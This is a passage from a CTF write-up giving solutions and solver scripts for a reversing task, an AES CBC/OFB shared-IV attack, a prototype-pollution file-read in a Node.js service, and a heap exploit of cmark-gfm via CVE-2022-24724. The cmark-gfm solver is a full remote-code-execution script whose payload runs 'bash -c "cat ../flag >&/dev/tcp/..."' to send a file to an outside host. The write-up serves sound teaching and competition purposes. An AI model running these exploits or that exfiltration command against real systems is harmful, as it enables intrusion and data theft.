There you go. I'll skip the walkthrough of the decompiled, modified `prob.chk` and of deriving its inverse; the solver code implements that inverse.
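For readers who want to sanity-check the inverse, here is a hedged sketch. The modified `chk` is not reproduced in this writeup, so `forward_guess` below is only inferred by reversing the solver step by step (it is an assumption, not the decompiled function); `solve` restates the solver with the rotation spelled out, and `sample` is a made-up input.

```python
MASK32 = 0xFFFFFFFF
KEY32 = 0xDEADBEEF

def forward_guess(data: bytes) -> bytes:
    """Assumed forward transform: the exact inverse of solve(), step by step."""
    for i in range(len(data) - 3):
        s = (i + 16) % 32
        w = int.from_bytes(data[i:i + 4], "little")
        w = ((w >> s) | (w << ((32 - s) % 32))) & MASK32   # rotate right by s
        w ^= KEY32
        data = data[:i] + w.to_bytes(4, "little") + data[i + 4:]
    return data

def solve(data: bytes) -> bytes:
    """Same steps as the solver code: last window first, XOR, rotate left."""
    for i in reversed(range(len(data) - 3)):
        s = (i + 16) % 32
        w = int.from_bytes(data[i:i + 4], "little") ^ KEY32
        w = ((w << s) | (w >> ((32 - s) % 32))) & MASK32   # rotate left by s
        data = data[:i] + w.to_bytes(4, "little") + data[i + 4:]
    return data

sample = b"GoN{not_the_real_flag}"
roundtrip = solve(forward_guess(sample))
print(roundtrip == sample)
```

The windows overlap (each step touches 4 bytes but advances by 1), so the inverse has to visit them in the opposite order; that is why the solver counts down from `len(ipt) - 4`.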
</details>
<details>
<summary>Solver Code</summary>
```python=
import struct
k = [161, 55, 37, 106, 136, 128, 88, 143, 139, 247, 182, 192, 140, 132, 222, 141, 79, 38, 69, 75, 184, 232, 66, 72, 152, 14, 202, 49, 143, 58, 194, 161, 241, 230, 237, 118, 254, 112, 85, 32, 220, 192, 179, 201, 216, 132, 141, 42, 53]
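def solve(ipt):
    # Invert the patched chk: visit the 4-byte windows from the last offset back to 0.
    for i in range(len(ipt) - 3):
        i = len(ipt) - 4 - i
        # Undo the XOR with the 0xDEADBEEF constant.
        r0 = int.from_bytes(ipt[i:i+4], "little") ^ 0xDEADBEEF
        # Rotate the 32-bit word left by (i + 16) % 32 and write it back.
        ipt = ipt[:i] + ((((r0 << ((i + 16) % 32)) | (r0 >> ((16 - i) % 32))) & 0xFFFFFFFF)).to_bytes(4, "little") + ipt[i+4:]
    return ipt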
print(solve(bytes(k)))
```
</details>
## O. Interchange
Category: Crypto\
Author: [c0m0r1]\
Solvers: 33
<details>
<summary>Description</summary>
It's chilling.
A dagger flies in and lodges in my chest.
But don't worry.
The code... is faster than the eye.
(*Encryptor Switched)
(For foreigners: it's an homage to a [famous scene](https://www.youtube.com/watch?v=XtqIpsPf5Mg) in a [Korean movie](https://en.wikipedia.org/wiki/Tazza:_The_High_Rollers))
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic knowledge of block cipher modes of operation (especially CBC and OFB)
1. **Objective** - Understand how to break AES-CBC/OFB when both modes share the same IV
Read [this paper](https://eprint.iacr.org/2007/385.pdf) and the exploit should be clear :)
Summary for those who don't want to read it: encrypt an all-zero plaintext in CBC mode, then XOR the result with the OFB-encrypted flag ciphertext. With a shared key and IV, the CBC ciphertext of zeros is exactly the OFB keystream.
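The identity behind the attack can be checked offline. This is a sketch under stated assumptions: `E` is a hash-based stand-in for AES block encryption (good enough here because CBC encryption and OFB only ever use the forward direction), padding is left out, and the key, IV and flag are made-up values rather than anything from the server.

```python
import hashlib
import os

BS = 16

def E(key: bytes, block: bytes) -> bytes:
    # Stand-in for AES block encryption (assumption, not the real cipher).
    return hashlib.sha256(key + block).digest()[:BS]

def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BS):
        prev = E(key, xor(pt[i:i + BS], prev))   # C_i = E(P_i ^ C_{i-1})
        out.append(prev)
    return b"".join(out)

def ofb_encrypt(key, iv, pt):
    out, state = [], iv
    for i in range(0, len(pt), BS):
        state = E(key, state)                    # O_i = E(O_{i-1})
        out.append(xor(pt[i:i + BS], state))
    return b"".join(out)

key, iv = os.urandom(16), os.urandom(16)
flag = b"GoN{dummy_flag_for_the_demo}"           # made-up value
zeros = bytes(((len(flag) + BS - 1) // BS) * BS)
keystream = cbc_encrypt(key, iv, zeros)          # CBC of zeros == OFB keystream
ct_ofb = ofb_encrypt(key, iv, flag)
recovered = xor(ct_ofb, keystream)
print(recovered)
```

With zero plaintext, each CBC block is just the encryption of the previous ciphertext block, which is the same recurrence OFB uses for its keystream.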
</details>
<details>
<summary>Solver Code</summary>
```
#!/usr/bin/python3
from pwn import *
context.log_level = "DEBUG"
BS = 16
unpad = lambda s : s[0:-s[-1]]
IP = "127.0.0.1"
PORT = 13111
p = remote(IP, PORT)
# CBC-encrypt a long all-zero plaintext
p.sendlineafter(">> ", "1")
p.sendlineafter(">> ", "\x00" * 0x1000)
ct_cbc = bytes.fromhex(p.recvline().split(b":")[-1].strip().decode())
# Get the OFB-encrypted flag ciphertext
p.sendlineafter(">> ", "3")
p.sendlineafter(">> ", "3")
p.sendlineafter(">> ", "2")
ct_ofb = bytes.fromhex(p.recvline().split(b":")[-1].strip().decode())
cbc_iv = ct_cbc[:BS]
ofb_iv = ct_ofb[:BS]
assert(cbc_iv == ofb_iv)
# The CBC ciphertext of zeros is the OFB keystream, so XOR recovers the plaintext
ans_li = []
for i in range(len(ct_ofb)):
    ans_li.append(ct_cbc[i] ^ ct_ofb[i])
flag = unpad(bytes(ans_li[BS:])).decode()
print(flag)
p.interactive()
```
</details>
## P. Showdown
Category: Pwnable\
Author: [Xion]\
Solvers: 0
<details>
<summary>Description</summary>
Enjoy our super-fast GitHub Flavored Markdown renderer service `Showdown!`
</details>
<details>
<summary>Solution</summary>
**TL;DR**: Exploit cmark-gfm with [CVE-2022-24724]
A Flask server with a simple frontend and backend is given. It calls the native [cmark-gfm](https://github.com/github/cmark-gfm) library, version 0.29.0.gfm.2, through ctypes.
Checking the GitHub advisories, we find [CVE-2022-24724], which affects the version used by the server.
The vulnerability is rather simple: table column counts are stored as `uint16_t`, and the column counts of the header row and the marker row must be equal. Overflowing the count on the marker row results in an OOB heap access when the alignments are set.
[extensions/table.c#L164](https://github.com/github/cmark-gfm/blob/0.29.0.gfm.2/extensions/table.c#L164):
```c=146
if (cell_matched || pipe_matched) {
  // We are guaranteed to have a cell, since (1) either we found some
  // content and cell_matched, or (2) we found an empty cell followed by a
  // pipe.
  cmark_strbuf *cell_buf = unescape_pipes(parser->mem, string + offset,
      cell_matched);
  cmark_strbuf_trim(cell_buf);
  node_cell *cell = (node_cell *)parser->mem->calloc(1, sizeof(*cell));
  cell->buf = cell_buf;
  cell->start_offset = offset;
  cell->end_offset = offset + cell_matched - 1;
  while (cell->start_offset > 0 && string[cell->start_offset - 1] != '|') {
    --cell->start_offset;
    ++cell->internal_offset;
  }
  row->n_columns += 1;
  row->cells = cmark_llist_append(parser->mem, row->cells, cell);
}
```
[extensions/table.c#L284](https://github.com/github/cmark-gfm/blob/0.29.0.gfm.2/extensions/table.c#L284):
```c=284
uint8_t *alignments =
    (uint8_t *)parser->mem->calloc(header_row->n_columns, sizeof(uint8_t));
cmark_llist *it = marker_row->cells;
for (i = 0; it; it = it->next, ++i) {
  node_cell *node = (node_cell *)it->data;
  bool left = node->buf->ptr[0] == ':', right = node->buf->ptr[node->buf->size - 1] == ':';
  if (left && right)
    alignments[i] = 'c';
  else if (left)
    alignments[i] = 'l';
  else if (right)
    alignments[i] = 'r';
}
```
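The effect of the two snippets can be modelled in a few lines of Python. This is a rough sketch, not the library's code: `alignment_of` and `simulate` are hypothetical helpers that mirror the `left`/`right` check and the `uint16_t` wrap-around, and the cell counts are the ones used in the leak stage of the solver below.

```python
def alignment_of(cell: bytes):
    """Mirror of the left/right check above; None means nothing is written."""
    left, right = cell[:1] == b":", cell[-1:] == b":"
    if left and right:
        return ord("c")
    if left:
        return ord("l")
    if right:
        return ord("r")
    return None

def simulate(header_cells: int, marker_cells):
    n_columns = header_cells & 0xFFFF               # uint16_t truncation
    assert n_columns == (len(marker_cells) & 0xFFFF), "table would be rejected"
    oob = {}
    for i, cell in enumerate(marker_cells):         # the loop walks every real cell
        value = alignment_of(cell)
        if value is not None and i >= n_columns:    # past the n_columns-byte array
            oob[i] = value
    return n_columns, oob

# Cell counts from the leak stage of the solver (SIZE = 0x1988).
markers = [b"--"] * (0x10000 + 0x1988)
markers[0x3690] = b":-"
n_columns, oob = simulate(0x1988, markers)
print(hex(n_columns), {hex(k): chr(v) for k, v in oob.items()})
```

Plain `--` cells write nothing, so the attacker chooses exactly which out-of-bounds offsets receive a `c`, `l` or `r` byte.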
To exploit this, we first need to understand how heap allocations are done:
1. Heap allocations go through a custom arena allocator, which allocates arenas starting at size 0x400000 and multiplies the size by 1.5 for each new arena. The arenas themselves are allocated with glibc `calloc()`.
2. Requested allocations are split off from the top of the current arena.
3. Free is a no-op, since all allocated arenas are freed at the end of parsing and rendering.
4. `MMAP_THRESHOLD` is fixed to 0x20000. This guarantees consistent allocation behavior across multiple renders (arenas are always mmap-ed) instead of the threshold being dynamically increased (which would place arenas on the heap).
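The growth rule gives a predictable sequence of arena sizes, sketched below. `arena_sizes` is a hypothetical helper, and the extra page per mapping is an assumption read off the `0x401000`-style constants in the solver rather than something stated by the allocator.

```python
PAGE = 0x1000
MMAP_THRESHOLD = 0x20000

def arena_sizes(count: int, first: int = 0x400000):
    """Arena sizes under the 1.5x growth rule described in the list above."""
    sizes, size = [], first
    for _ in range(count):
        sizes.append(size)
        size += size // 2          # multiply by 1.5 using integer arithmetic
    return sizes

sizes = arena_sizes(4)
# Assumption: each mmap-ed chunk spans the arena plus one extra page.
mapped = [s + PAGE for s in sizes]
print([hex(s) for s in sizes])
print([hex(m) for m in mapped])
print(all(s >= MMAP_THRESHOLD for s in sizes))
```

Every arena is far above the threshold, so each one gets its own mapping, and the mapped sizes line up with the offsets subtracted from `arena_base` in the solver.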
For players' convenience, the server gives out the address of the arena allocator structure once the player passes "Proof of Address Leak" 5 times in a row.
The exploit plan is simple:
1. Get an address leak using the OOB
2. Exploit `cmark_strbuf_free()` with forged `mem` & `ptr`
To leak an address, we use the OOB write to partially overwrite the `ptr` of a `cmark_strbuf` that is about to be rendered. Since consecutive mmap chunks grow downwards, we can place the alignment array at the top of one arena so that the OOB write hits an object at the bottom of the previous arena.
Gaining RCE is much harder. Players are expected to run into these challenges:
1. OOB writes are only possible with the bytes 'c', 'l' and 'r'.
2. It is hard to write an address (`system`) onto an arena because of the null bytes; these are replaced with U+FFFD immediately at parser feed.
3. It is also hard to spray addresses on an arena (without tables) using objects such as `cmark_strbuf`, because inlines are parsed at document finalization.
4. `cmark_strbuf` can be sprayed with table cells, but the `re2c`-generated parser only accepts valid UTF-8 strings.
5. Considering the following allocations of a table (excluding small allocations), it is hard to OOB write into a `cmark_strbuf` that will be freed with `cmark_strbuf_free()`:
    1. Defunct marker_row that should have been popped from the arena (probably a memory leak bug) - 0x68 at minimum for each cell
    2. Parsed marker_row - 0x68 at minimum for each cell
    3. Parsed header_row - 0x68 at minimum for each cell
    4. **alignment** array
    5. header_row made into nodes for render - 0xf0 at minimum for each cell

Of the above, only 2 and 3 are freed, and they are freed through `free_table_row()` immediately at the end of `try_opening_table_header()`; **we can only trigger `cmark_strbuf_free()` on a forged `cmark_strbuf` by an OOB write into our own table**.
Given the memory limit (256MB), the time limit (table cell insertion takes `O(N^2)` time for `N` cells in a row) and the constraints above, we must compute the exact number of header and marker row cells so that the address "sprays" and the alignment array land exactly at the desired places.
By rough computation and a binary search over the number of cells for the desired layout, the solution uses 0x24720 header cells and 0x14720 marker cells.
Since a leak is given, we brute force until the `system` address is UTF-8 decodable and a partial overwrite of the arena allocator struct address can point to our payload. In total this requires about 800 attempts.
This solution is best understood by computing the arena layout yourself, so try it out using the solver code as a reference.
</details>
<details>
<summary>Solver Code</summary>
```python=3
#!/usr/bin/env python3
from pwn import *
import requests
import itertools, bisect
from time import sleep
libc = ELF('./libc-2.31.so')
libgfm = ELF('../public/app/libs/libcmark-gfm.so.0.29.0.gfm.2')
libgfm_ext = ELF('../public/app/libs/libcmark-gfm-extensions.so.0.29.0.gfm.2')
url = 'http://127.0.0.1:56925'
LHOST, LPORT = 'REDACTED', 12345
def targlen(l):
    if l % 3 == 0:
        l -= 1
    return l * 2 // 3 - 1

def clr(c):
    if isinstance(c, int):
        c = bytes([c])
    if c == b'c':
        return b':-:'
    elif c == b'l':
        return b':--'
    elif c == b'r':
        return b'--:'
    assert False

leak_ctr = 0
if 'Nope!' != requests.get(url + '/chal/leak').text:
    leak_ctr = 5
# Step 1. Leak
while leak_ctr < 5:
    try:
        res = requests.post(url + '/reload')
    except requests.exceptions.ConnectionError:
        pass
    for i in range(10):
        try:
            requests.get(url + '/')
        except requests.exceptions.ConnectionError:
            sleep(0.2)
        else:
            break
    code = ''
    SIZE_FILL = 0x100
    code += '|'
    code += 'Z'*0x637b0 + '|'
    for i in range(SIZE_FILL-2):
        code += f'{i}|'
    code += 'B'*0x42 + '|\n'
    code += '|' + '-|' * SIZE_FILL + '\n\n'
    SIZE = 0x1988
    code += '|'
    for i in range(SIZE):
        code += f'{i}|'
    code += '\n'
    markers = ['--'] * (0x10000 + SIZE)
    markers[0x3690] = ':-'
    for i in range(0x6c, 0xa8):
        markers[0x3740 + i] = ":-"
    code += '|' + '|'.join(markers) + '|\n\n'
    try:
        res = requests.post(
            url + '/render',
            data=code,
            headers={'Content-Type': 'text/markdown'},
            timeout=60
        ).content
    except requests.exceptions.Timeout:
        log.warning('Leak failed (no response in 60s), retry...')
        continue
    leakidx = res.find(b'l'*(0xa8-0x6c))
    if leakidx < 0:
        log.warning('Leak failed (marker not found), retry')
        continue
    leakidx += 0xa8-0x6c
    if res[leakidx+6:leakidx+11] != b'</th>':
        log.warning('Leak failed (addr leak len < 6), retry...')
        continue
    leak_addr = u64(res[leakidx:leakidx+6]+b'\0\0')
    try:
        requests.post(url + '/chal/proof_of_leak', data=str(leak_addr))
    except requests.exceptions.ConnectionError:
        pass
    leak_ctr += 1
    log.success(f'leak counter: {leak_ctr}')
# Step 2. Pop shell
for i in range(10000):
    log.info(f'Try {i}')
    libc.address = 0
    libgfm.address = 0
    libgfm_ext.address = 0
    try:
        res = requests.post(url + '/reload')
    except requests.exceptions.ConnectionError:
        pass
    for i in range(10):
        try:
            leak_addr = int(requests.get(url + '/chal/leak').text, 16)
        except requests.exceptions.ConnectionError:
            sleep(0.2)
        else:
            break
    libgfm.address = leak_addr - libgfm.sym['CMARK_ARENA_MEM_ALLOCATOR']
    assert libgfm.address & 0xfff == 0
    log.success(f'libcmark-gfm : {libgfm.address:#014x}')
    libc.address = libgfm.address + 0x1582000
    log.info (f'libc : {libc.address:#014x}')
    libgfm_ext.address = libgfm.address - 0xc000
    log.info (f'libcmark-gfm-ext : {libgfm_ext.address:#014x}')
    arena_base = libgfm_ext.address - 0x14000
    log.info (f'arena base : {arena_base:#014x}')
    if set(p64(libc.sym['system'])[:6]) & set(b'\x00\x0a\x0d\\|'):
        log.warning('Banned char present in system addr, retry')
        continue
    try:
        p64(libc.sym['system'])[:6].decode('utf-8')
    except UnicodeDecodeError:
        log.warning('Non-UTF8 system addr, retry')
        continue
    spray_base = arena_base
    spray_base -= 0x401000
    spray_base -= 0x601000
    spray_base -= 0x901000
    spray_base -= 0xd81000
    spray_base += 0x18 + 0x68
    spray_range = [spray_base + i * 0x68 for i in range(0x2471f - 0x3445)]
    log.info(f'spray range : {spray_range[0]:#014x} ~ {spray_range[-1]:#014x}')
    for hiword in itertools.product([b'c', b'l', b'r'], repeat=2):
        hiword_p16 = b''.join(hiword)
        cmd = u64(p16(0x6c72) + hiword_p16 + p32(libgfm.sym['CMARK_ARENA_MEM_ALLOCATOR'] >> 32))
        cmd -= 2
        sidx = bisect.bisect(spray_range, cmd) - 1
        if sidx < 0:
            continue
        ofs = cmd - spray_range[sidx]
        if ofs <= 0x70:
            break
    else:
        log.warning('Not in range, retry')
        continue
    log.success(f'Snipe Index : {sidx}')
    log.success(f'Snipe Address : {cmd:#014x}')
    code = b''
    arr = [b'']*0x24720
    arr[0x3444] = b'z'*targlen(0x8 + ofs)
    arr[-1] = b'z'*targlen(0x78 - ofs)
    snipe = f'bash -c "cat ../flag >&/dev/tcp/{LHOST}/{LPORT}";#'.encode('ascii')
    snipe = b'aa' + snipe.ljust(0x7282-0x6c72, b'a')
    snipe += p64(libc.sym['system'])[:6]
    arr[0x3445 + sidx] = snipe
    code += b'|' + b'|'.join(arr) + b'|\n'
    markers = [b'-'] * 0x14720
    markers[0x5d50] = clr(0x72)
    markers[0x5d51] = clr(0x72)
    markers[0x5d52] = clr(hiword[0])
    markers[0x5d53] = clr(hiword[1])
    markers[0x5d58] = clr(0x72)
    markers[0x5d59] = clr(0x6c)
    markers[0x5d5a] = clr(hiword[0])
    markers[0x5d5b] = clr(hiword[1])
    code += b'|' + b'|'.join(markers) + b'|\n\n'
    try:
        requests.post(
            url + '/render',
            data=code,
            headers={'Content-Type': 'text/markdown'},
            timeout=30
        )
    except requests.exceptions.Timeout:
        log.success('Exploit request timed out, enjoy your flag!')
    else:
        log.warning('Exploit request not timed out, retry')
        continue
    l = listen(LPORT)
    conn = l.wait_for_connection()
    print(conn.readall())
    break
```
</details>
## Q. NSS
Category: Web\
Author: [c0m0r1]\
Solvers: 14
<details>
<summary>Description</summary>
The Simple and Secure Node.js Storage Service!
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic knowledge of Node.js REST API servers and object prototypes in JavaScript.
1. **Objective** - Understand how prototype pollution occurs in vulnerable code and how to leverage it into LFI.
The main vulnerability is in the `/api/users/:userid/:ws` endpoint (file.js#L78):
```javascript
const workspace = user.workspaces[ws_name];
if(!workspace)
    return res.status(404).json({ok: false, err: "Failed to find workspace"});
if(!f_name || !f_path)
    return res.status(400).json({ok: false, err: "Invalid file name or path"});
if(!write_b64_file(path.join(user.base_dir, f_path), f_content))
    return res.status(500).json({ok: false, err: "Internal server error"});
workspace[f_name] = f_path;
return res.status(200).json({ok: true});
```
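Since these keys are not validated at all, an attacker can supply an arbitrary key such as "`__proto__`", which triggers prototype pollution. (In the notation below, `Object.__proto__` stands for the prototype shared by plain objects, i.e. `Object.prototype`.)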
```
ws_name == "__proto__" => workspace = user.workspaces["__proto__"] == Object.__proto__
workspace[f_name] = f_path => Object.__proto__.f_name = f_path
```
With some further analysis, the attacker can override the `base_dir` of the storage and bypass the session check to read the flag.
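To keep the examples in one language, here is a tiny Python model of the JavaScript lookup rule that makes this work. It is an illustration only: `JSObject`, `plain` and `OBJECT_PROTOTYPE` are hypothetical names modelling property lookup along a prototype chain, not the server's code, and the values are made up.

```python
class JSObject:
    """Tiny Python model of JavaScript property lookup (illustration only)."""
    def __init__(self, proto=None, **own):
        self.proto = proto
        self.own = dict(own)

    def get(self, key):
        if key == "__proto__":
            return self.proto
        obj = self
        while obj is not None:           # walk up the prototype chain
            if key in obj.own:
                return obj.own[key]
            obj = obj.proto
        return None                      # stands in for `undefined`

    def set(self, key, value):
        self.own[key] = value

OBJECT_PROTOTYPE = JSObject()            # shared by every plain object

def plain(**own):
    return JSObject(OBJECT_PROTOTYPE, **own)

user = plain(workspaces=plain())
unrelated = plain()

workspace = user.get("workspaces").get("__proto__")   # ws_name == "__proto__"
workspace.set("base_dir", "/usr/src/app")              # workspace[f_name] = f_path

print(unrelated.get("base_dir"))
```

Any object that lacks its own `base_dir` now appears to have one, which is the lever the solver uses for `base_dir`, `owner`, `expire` and the fake token.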
</details>
<details>
<summary>Solver Code</summary>
```python=1
import requests
import json
import base64
URL = "http://127.0.0.1:3000"
ID = "c0m0r1"
PASS = "a" * 0x10
PWD = "/usr/src/app"

def send_post_req(url, data):
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    res = requests.post(url, data=json.dumps(data), headers=headers)
    return res

def send_get_req(url, data):
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    res = requests.get(url, data=json.dumps(data), headers=headers)
    return res

def PP(id, token, key, val):
    headers = {'Content-Type': 'application/json; charset=utf-8'}
    data = {"token": token, "file_name":key, "file_path":val, "file_content":"a"}
    res = send_post_req(URL + "/api/users/%s/%s"%(id,"__proto__"), data)
    assert(res.status_code == 200)

res = send_post_req(URL + "/api/users", {"userid": ID, "pass": PASS})
assert(res.status_code == 200)
res = send_post_req(URL + "/api/users/auth", {"userid": ID, "pass": PASS})
assert(res.status_code == 200)
token = res.json()['token']
res = send_post_req(URL + "/api/users/%s"%ID, {"token": token, "ws_name":"test"})
assert(res.status_code == 200)
# Object.__proto__.base_dir = PWD
PP(ID, token, "base_dir", PWD)
# Object.__proto__.workspaces = Object
PP(ID, token, "workspaces", "some_str")
# Object.__proto__.fake_token = Object
PP(ID, token, "fake_token", "some_str")
# Object.__proto__.expire = 99999999999999
PP(ID, token, "expire", "99999999999999")
# Object.__proto__.owner = __proto__
PP(ID, token, "owner", "__proto__")
# Object.__proto__.thisisflagpath = flag
PP(ID, token, "thisisflagpath", "flag")
# with following request, the values will be
# userid == "__proto__"
# sess = tokens[token] == tokens["fake_token"] == Object.__proto__.fake_token == Object
# sess.owner == Object.__proto__.owner == "__proto__"
# sess.expire == Object.__proto__.expire == "99999999999999" (session bypassed)
# user = users[userid] == Object.__proto__
# workspaces = user.workspaces[ws_name] == Object.__proto__.__proto__
# f_path = workspace[f_name] == Object.__proto__.thisisflagpath == "flag"
# user.base_dir == Object.__proto__.base_dir == PWD
# ... finally read PWD + flag
res = send_get_req(URL + "/api/users/%s/%s/%s"%("__proto__","__proto__","thisisflagpath"), {"token": "fake_token"})
print(res.text)
flag = base64.b64decode(res.json()['file_content']).decode()
print("[+] flag : %s"%flag)
# i don't believe this is optimal exploit
# ... and i hope there's no unintended solution exist
</details>
[Xion]: https://twitter.com/0x10n
[okas832]: https://twitter.com/okascmy1
[c0m0r1]: https://twitter.com/c0m0r1
[HTTPS Session ID Poisoning]: https://i.blackhat.com/USA-20/Wednesday/us-20-Maddux-When-TLS-Hacks-You.pdf
[hxp CTF 2020 security scanner]: https://ctftime.org/writeup/25661
[Balsn CTF 2019 pyshv2]: https://ctftime.org/writeup/16723
[CVE-2021-32761]: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-32761
[CVE-2022-24724]: https://github.com/github/cmark-gfm/security/advisories/GHSA-mc3g-88wq-6f4x